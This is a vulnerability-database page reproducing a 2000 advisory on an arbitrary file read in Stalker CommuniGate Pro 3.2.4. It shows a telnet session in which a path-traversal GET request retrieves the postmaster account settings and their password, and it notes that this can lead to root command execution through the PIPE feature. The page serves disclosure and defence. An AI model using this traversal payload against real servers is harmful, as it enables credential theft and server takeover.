Vulners
Lucene search
Stalker CommuniGate Pro 3.2.4 - Arbitrary File Read
source: https://www.securityfocus.com/bid/1493/info
A vulnerability exists in the CommuniGate Pro product, from Stalker. It is possible to exploit this vulnerability to read arbitrary files on the filesystem. As CommuniGate Pro runs as root, any file can be accessed. Using this flaw, it is possible to gain enough privilege to remotely execute commands as root.
Retrieve the postmaster/manager configuration file:
homer:~$ telnet ilf 8010
Escape character is '^]'.
GET /Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.macnt/account.settings HTTP/1.0
HTTP/1.0 200 OK
Content-Length: 61
Date: Mon, 03 Apr 2000 09:17:35 GMT
Content-Type: application/octet-stream
Server: CommuniGatePro/3.2.4
Expires: Tue, 04 Apr 2000 09:17:35 GMT
{ ExternalINBOX = NO; Password = 8093; UseAppPassword = YES;}
Connection closed by foreign host.
homer:~$
Using this information, it is possible to alter the configuration on the mail server to allow execution using its PIPE feature.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Apr 2000 00:00Current
7.4High risk
Vulners AI Score7.4